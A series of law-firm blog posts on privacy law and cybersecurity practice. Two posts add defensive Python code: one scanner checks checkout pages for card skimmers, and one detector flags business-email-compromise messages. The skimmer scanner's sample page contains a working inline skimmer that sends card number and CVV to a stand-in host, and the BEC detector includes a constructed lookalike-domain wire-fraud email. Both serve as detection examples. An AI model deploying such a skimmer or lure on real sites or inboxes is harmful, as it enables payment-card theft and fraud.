On August 30, 2020, the California Legislature passed AB-1281 which, if signed by Governor Newsom, will extend two key exemptions to the California Consumer Privacy Act (the “CCPA”) until January 1, 2022.  The extension of these exemptions, which will otherwise expire on January 1, 2021 without legislative or voter action, will come as welcome news to businesses as they continue to implement CCPA-compliant policies and procedures.

The two exemptions are the “employee” exemption and the “business-to-business” (“B2B”) exemption:

  • The employee exemption provides that personal information collected by a business in the employment context is mostly exempt from the CCPA provided that it is used (1) in the course of an individual’s employment, (2) to maintain an emergency contact on file, or (3) to administer benefits to another person.
  • Under the B2B exemption, personal information reflected in communications between businesses is largely exempt from the CCPA if the consumer is acting on behalf of a business and is conducting due diligence or providing or receiving a product or service.

The California Privacy Rights Act (“CPRA”), if approved by California voters in November, will supersede AB-1281’s extensions.  The CPRA, however, would in fact further extend these exemptions until January 1, 2023.

For more information as to the extent of these exemptions, CCPA generally, and other states’ privacy laws, please contact us.

CSG/LIFARS Webinar: Cybersecurity and Data Protection Best Practices Amid COVID-19

CSG’s Michelle A. Schaap will join Ondrej Krehel, CEO and Founder of LIFARS, LLC, and Roota Almeida, CISO with Delta Dental of New Jersey and Connecticut, on Wednesday, July 29, from 3:00 – 3:45 PM EDT for a virtual discussion around strategy and best practices in the face of the current escalated legal and cyber threat landscape.

The program entitled, “Giving Diligence its Due: Timeless Strategies for Surviving Change,” will cover a range of topics including:

  • The impact of an increasingly remote workforce on compliance policies and procedures
  • The value of implementing written data protection procedures
  • How to prepare for due diligence questionnaires
  • Cybersecurity frameworks to help ensure compliance with current regulations

To register for this program, please visit the event website.

Today, July 16, 2020, the Court of Justice¹ invalidated Privacy Shield as a means for a business to self-certify that it is securely and appropriately protecting personal data when transferring such data from the EU to the United States. In part, the Court found that the Privacy Shield did not adequately ensure individuals’ audit rights or appropriate recourse, and therefore invalidated Privacy Shield, effective immediately. There is no grace period.

This same court invalidated the Safe Harbor in 2015, and Privacy Shield then replaced that Safe Harbor.

This ruling impacts more than 5,000 companies that incurred the time and expense to self-certify under Privacy Shield. Continue Reading No More Safe Harbor… Take Two: Immediate Invalidation of Privacy Shield

The FBI issued an alert warning of an “e-skimming” attack targeting e-commerce websites.  The bad actors inject code directly into the e-commerce site’s checkout pages to skim customers’ account and payment information as it is entered.

The notice, found here, provides the details of this attack.

As always, the best defense against this and other cyberattacks is to have layers of defenses and proactive policies and procedures in place, including:

  • Patching systems, including operating systems, software and third party-sourced code
    • Patching systems includes ensuring that your remote work force is keeping their devices touching the company’s environment patched, too
  • Keep anti-virus and anti-malware up to date
    • Remote staff members should be accessing the company’s environment through a secure VPN
  • Disable extensions and functions within your site that are not being used

Also, remember that less is more:  If you have inactive accounts, consider removing these from your live, connected and operating environments and, instead, retain that data only in off-line archives.  Further, review your data destruction policies, and delete old and/or superseded account information.
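The FBI alert above concerns skimming code injected into a site’s own pages, which patching and disabling unused extensions reduce but do not detect.  The following is an added example, not code from the FBI notice or from this blog, of the kind of check an e-retailer can run against its checkout page: it inventories every script on the page, flags external scripts from hosts outside an allowlist, and flags inline scripts that are not in a known-good hash baseline and that exhibit skimmer behavior (reading form fields, hooking submit events, obfuscation, and an exfiltration channel).  The sample HTML, the allowlist hosts and the approved inline script are constructed for illustration.

```python
"""Scan a checkout page's HTML for script content that departs from a known-good
baseline, the pattern behind e-skimming attacks on e-commerce sites.
The page, allowlist and baseline below are constructed for this example."""
import hashlib
import json
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of hosts permitted to serve scripts to the checkout page.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}


def _sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Constructed baseline: hashes of every inline script approved at deploy time.
APPROVED_INLINE = "window.checkoutReady = true;"
BASELINE_INLINE_HASHES = {_sha256(APPROVED_INLINE)}

# Behaviours a skimmer needs: read field values, hook user events, hide its
# payload, and send the data somewhere. Each hit is reported as an indicator.
SUSPECT_PATTERNS = [
    r"\.value\b",                                          # reads field contents
    r"(addEventListener|onsubmit|onkeyup|onblur)",         # hooks form activity
    r"(atob|btoa|String\.fromCharCode|unescape|eval)\s*\(",  # obfuscation/decoding
    r"(fetch|XMLHttpRequest|new Image|\.src\s*=)",         # exfiltration channel
]


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf).strip())
            self._in_script = False


def scan_checkout_html(html: str) -> dict:
    """Return unexpected external script hosts and unapproved inline scripts."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = {"unexpected_hosts": [], "unapproved_inline": []}
    for src in collector.external:
        host = urlparse(src).hostname  # None for same-origin relative paths
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            findings["unexpected_hosts"].append(src)
    for body in collector.inline:
        digest = _sha256(body)
        if digest in BASELINE_INLINE_HASHES:
            continue
        indicators = [p for p in SUSPECT_PATTERNS if re.search(p, body)]
        findings["unapproved_inline"].append(
            {"sha256": digest[:16], "indicators": indicators})
    return findings


# Constructed checkout page: two approved scripts, one approved inline script,
# then a third-party loader and an inline skimmer that were not there at deploy.
SAMPLE_CHECKOUT = """
<html><body>
<script src="https://cdn.example/checkout.js"></script>
<script src="/static/app.js"></script>
<script>window.checkoutReady = true;</script>
<script src="https://stats-collect.example/t.js"></script>
<script>
document.querySelector('form').addEventListener('submit', function () {
  var d = document.getElementById('cc').value + '|' + document.getElementById('cvv').value;
  new Image().src = 'https://stats-collect.example/p?d=' + btoa(d);
});
</script>
</body></html>
"""

if __name__ == "__main__":
    print(json.dumps(scan_checkout_html(SAMPLE_CHECKOUT), indent=2))
```

Run against a copy of the live checkout page on a schedule and alert on any finding; a new host or a changed inline script is exactly what a skimmer injection looks like.  In production, pair this with a Content-Security-Policy `script-src` allowlist and Subresource Integrity hashes on external scripts, so that an injected script is blocked by the browser as well as detected by the scan.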

Other best practices for e-retailers include:

  • Remind customers to use robust passwords
  • Direct customers to not use the same password for multiple accounts
  • Remind remotely working employees to not use the same device for work access as family members use to game, visit school sites and/or visit other e-commerce sites

Be alert, be aware and be secure.

You are in a fantasy football league registered under your email and your password.  Unbeknownst to you, however, the league’s site has been breached, and access credentials have been stolen.  The site discovers the breach, investigates the breach, and gives notice to impacted individuals.

If you are lucky, the time between when the original breach occurred and when you receive notice is 60 days; more likely it will be longer, potentially 18 months or more.  In the meantime, because you reuse your password for multiple accounts, the bad actor that compromised the fantasy league site has already used your password to access your Gmail or AOL account, reset your password, logged into your bank account and drained your funds.

Sound like a bad made-for-TV movie or detective show episode?

Sadly, the scenario outlined above is true and happened to a gentleman in Texas, and was shared during a recent InfraGard¹ webinar. Continue Reading The Life of a Data Breach: The “Gift” That Keeps on Giving

The “kill chain” (in this context, the FBI’s Financial Fraud Kill Chain) refers to the FBI’s ability to interrupt a fraudulent wire transfer and recover the funds before they are lost.

This is an extremely powerful resource given that cyber criminals have been targeting entities that use Microsoft Office 365 and Google G Suite to perpetrate business email compromise (BEC) scams.  The “phish kits” used for this particular attack enable the bad actor to mimic the otherwise legitimate cloud-based email login to compromise accounts and lure victims into sending or misdirecting funds. Over the past five years, cyber criminals targeting Microsoft 365 and Google G Suite users have used this scam to steal more than $2.1 billion.

If any of your clients are fooled by a spoofed email, phish or link and miswire funds, and they notify the FBI within 48 hours (sometimes as long as 72 hours, but the sooner the better), there is a strong probability, though no guarantee, that the FBI can recapture some, if not all, of the funds.  The party that sent the funds must alert the FBI within this window for there to be any chance of success.

We do recommend that impacted companies make contact through our office so that we can be certain information gets to the right agents at the FBI ASAP.

While we always recommend a strong defensive posture – including training of personnel, processes for approval and verification of any requested wiring of funds, and other appropriate measures – even with vigilant personnel, good people are being fooled.
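Verification processes work best when the suspicious message is caught before it reaches the person approving the wire.  As an added example (a heuristic of my own, not the FBI’s process and not code from this blog), the following checks the headers and body of an incoming message for the traits that BEC lures share: a Reply-To that points somewhere other than the sending domain, a sender domain that is a lookalike of the company’s own, an executive’s display name arriving from an outside domain, and payment-change language in the body.  The company domain, the executive names and both sample messages are constructed for illustration.

```python
"""Flag e-mail messages with the header and body traits typical of business
email compromise (BEC) lures. Domains, names and messages are constructed."""
import re
from email import policy
from email.parser import Parser
from email.utils import parseaddr

# Assumed: the organisation's own domain and the executives most often impersonated.
OUR_DOMAIN = "acme-widgets.example"
PROTECTED_NAMES = {"jane doe", "pat lee"}
WIRE_WORDS = re.compile(
    r"\b(wire|wiring|transfer|routing|account number|urgent|asap|confidential)\b", re.I)


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch typo-squatted sender domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _normalize(domain: str) -> str:
    """Fold common look-alike substitutions so rn/m, 0/o, 1/l and vv/w compare equal."""
    return (domain.lower().replace("rn", "m").replace("0", "o")
            .replace("1", "l").replace("vv", "w"))


def _domain(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def bec_indicators(raw_message: str) -> list:
    """Return a list of human-readable reasons the message looks like a BEC lure."""
    msg = Parser(policy=policy.default).parsestr(raw_message)
    display_name, from_addr = parseaddr(str(msg.get("From", "")))
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    from_dom, reply_dom = _domain(from_addr), _domain(reply_addr)
    reasons = []

    if reply_dom and reply_dom != from_dom:
        reasons.append(f"reply-to domain {reply_dom} differs from sender domain {from_dom}")

    if from_dom != OUR_DOMAIN:
        if (_normalize(from_dom) == _normalize(OUR_DOMAIN)
                or 0 < _edit_distance(from_dom, OUR_DOMAIN) <= 2):
            reasons.append(f"lookalike sender domain {from_dom}")
        if display_name.strip().lower() in PROTECTED_NAMES:
            reasons.append(
                f"display name '{display_name}' impersonates an executive from outside {OUR_DOMAIN}")

    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body else ""
    hits = sorted({m.lower() for m in WIRE_WORDS.findall(text)})
    if len(hits) >= 2:
        reasons.append("payment-change language: " + ", ".join(hits))
    return reasons


# Constructed lure: lookalike domain (vv for w), outside Reply-To, CEO's name.
LURE = """From: Jane Doe <jane.doe@acme-vvidgets.example>
Reply-To: jane.doe.ceo@gmail.example
To: ap@acme-widgets.example
Subject: Urgent wire
Content-Type: text/plain; charset="us-ascii"

Please wire the vendor deposit today to the new account number below. Keep this confidential.
"""

# Constructed legitimate internal message for comparison.
LEGIT = """From: Pat Lee <pat.lee@acme-widgets.example>
To: ap@acme-widgets.example
Subject: Board deck
Content-Type: text/plain; charset="us-ascii"

Attached is the draft deck for Thursday.
"""

if __name__ == "__main__":
    for label, raw in (("lure", LURE), ("legit", LEGIT)):
        print(label, bec_indicators(raw) or ["no indicators"])
```

A message that trips any indicator should be routed to the out-of-band verification step (a phone call to a known number, never to a number in the email) before any wire is approved; the heuristics reduce the load on people, they do not replace the process.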

Please contact us to discuss training for your personnel, developing, reviewing and/or improving your processes, and to make introductions for you with your local FBI agents before you need to call them to activate the kill chain.

Even if your business is based on the East Coast, you are likely to feel the effects of the California Consumer Privacy Act (“CCPA”), which will be effective January 1, 2020.

CCPA applies to for-profit businesses that:

  • Do business in the state of California; collect, or contract with a vendor for the collection of, personal information of “consumers[1]”; and determine the means or purpose of processing the data and
    • Have annual gross revenues in excess of $25,000,000 OR
    • Buy, receive, sell or share information about 50,000 or more consumers, households or devices for commercial purposes OR
    • Derive more than half of their revenue from selling consumers’ personal information.

So… if you are not doing business in California, or you do not fall into one of the sub-categories enumerated above, why do you need to worry about CCPA? Continue Reading Not in California? Here’s Why the CCPA Should Still Be on Your Radar

States continue to pass legislation addressing the protection and breach of private information and, on July 25, 2019, New York joined the growing trend when Governor Andrew Cuomo signed the Stop Hacks and Improve Electronic Data Security Act (or “SHIELD Act”) into law.  The SHIELD Act significantly amends New York’s data protection and data breach notification laws – expanding their reach beyond businesses operating in New York and imposing new requirements on persons and businesses in possession of New York residents’ private information.

Effective March 2020, the proactive portion of the SHIELD Act will:

  • Apply to any business that has personal information (“PI”) regarding any New York resident
  • Require those businesses to adopt proactive measures to safeguard that PI
  • Require businesses to vet vendors entrusted with or with access to that PI

The amendments to the current New York breach notification law, effective on October 23, 2019, redefine a “breach” to include the “mere” unauthorized access to PI (expanding the law beyond the actual acquisition of such PI without authorization).

While the amendment to the breach notification requirements may not greatly impact businesses’ current practices, the proactive requirements will be felt by any business that is not already taking “reasonable” measures to safeguard PI in their control.  And if you are a vendor to any of these businesses, and you are not prepared to adopt the requisite proactive measures to protect PI entrusted to you, then you may lose that business. Continue Reading The Long Reach of New York’s SHIELD Act

After 9/11, many companies restricted corporate travel and began embracing online conferencing resources – whether by telephone, video or otherwise.

Now, Webex, Zoom and other similar services are bringing people into the same (virtual) room to facilitate collaboration and negotiation without leaving the comfort of their office or home.

These tools are time saving and effective – but they must be used with privacy and security in mind.

A few thoughts worth considering:

  • When selecting a provider, make sure that the provider offers security controls and password protection – and then use those protections before launching the application
  • When sending a calendar invite to attendees, do NOT include the host (leader) PIN!  Doing so would allow others to start meetings on your account and use your service
  • If you are recording your session, consider whether other attendees would be offended if they did not know they were being recorded
  • If you are sharing your screen, be VERY mindful of what else may “pop up” on that screen – outside attendees should not be able to view ANY other aspect of your activities
  • If you are using a video/webcam feature, consider what else may be viewed by other attendees
    • Is there a white board behind you that lists current projects?
    • Could someone walk behind you, not knowing you were on a video chat, and put you in an awkward situation – during one video conference I participated in, an attendee’s significant other walked by in underwear…
  • Be careful when you send the invitation that your email did not “autofill” the address of attendees such that someone joined your call who has nothing to do with the project at hand – and may not be part of your organization
  • Do not take unrelated calls while on a video chat – even if you are on mute others can see you are not paying attention and you never know who can read lips
  • Make sure the resource you are using – whether Webex, Zoom or otherwise – is secure.
  • If multiple parties are on a call, and then you wish to speak to “your side,” do not stay on the same bridge.  Circulate a new dial in just for your team to ensure no persons from the “other side” stayed on to hear the ensuing strategy or evaluation discussion.

Note that the NJCCIC (the New Jersey Cybersecurity and Communications Integration Cell) advised that earlier this year researchers discovered a vulnerability in WebEx, Zoom and other online conferencing products.  APIs (or Application Programming Interfaces) were used to enumerate valid meeting IDs, which could then be used to join meetings that were not password protected and possibly to maintain access for an extended period of time.  Cisco and Zoom issued alerts to their users as to security measures that users can take to secure their conferences.

As with any technology, video conferencing is a wonderful tool, but should be used wisely to ensure that only those you intend are able to participate, and see and hear only relevant information.

In the continuing void at the federal level, more and more states are being proactive in adopting legislation that seeks to protect US residents’ personal data, and to impose stricter guidelines on companies that experience a data breach.

Although Washington State did not pass its previously pending bill, which would have been more stringent on data controllers and processors than the looming California Consumer Privacy Act, Washington did adopt new terms for its breach notification statute.  Effective as of March 2020, a “breach” requiring notice will include unauthorized access, disclosure, alteration and/or compromise of biometric and/or health data (previously excluded from the definition of personal information). Further, the window in which the entity suffering a breach must give notice has been reduced from 45 days to 30 days.

Many states, including New Jersey, New York, Florida, and Texas, have either adopted or are considering proactive legislation that will require those controlling and/or processing personal data to take “reasonable” measures to protect that data while under that entity’s control.

Without a consistent definition of “personal information,” of what constitutes a “breach,” and of what are “reasonable” measures, it is challenging for businesses to prepare.  That said, businesses that fail to take “some” measure to protect data will likely find themselves subject to liability even if their jurisdiction does not have proactive legislation in place. As discussed in the Dittman case, a data breach is a “foreseeable risk” against which companies have a “common law duty” to protect personal data.

Resources are available to help companies to take steps toward being “reasonable” in collecting, receiving, storing, processing, sharing and destroying data.  Looking for those resources is the first step toward being a responsible data controller and processor.  In New Jersey, the NJCCIC offers insights weekly into the latest threats.  NIST has frameworks for small and midsize businesses, as well as for larger entities.  SANS has forms that serve as useful starting points for developing policies and procedures.  The process can be done, but it can no longer be ignored.

For guidance on how to begin, please contact our offices.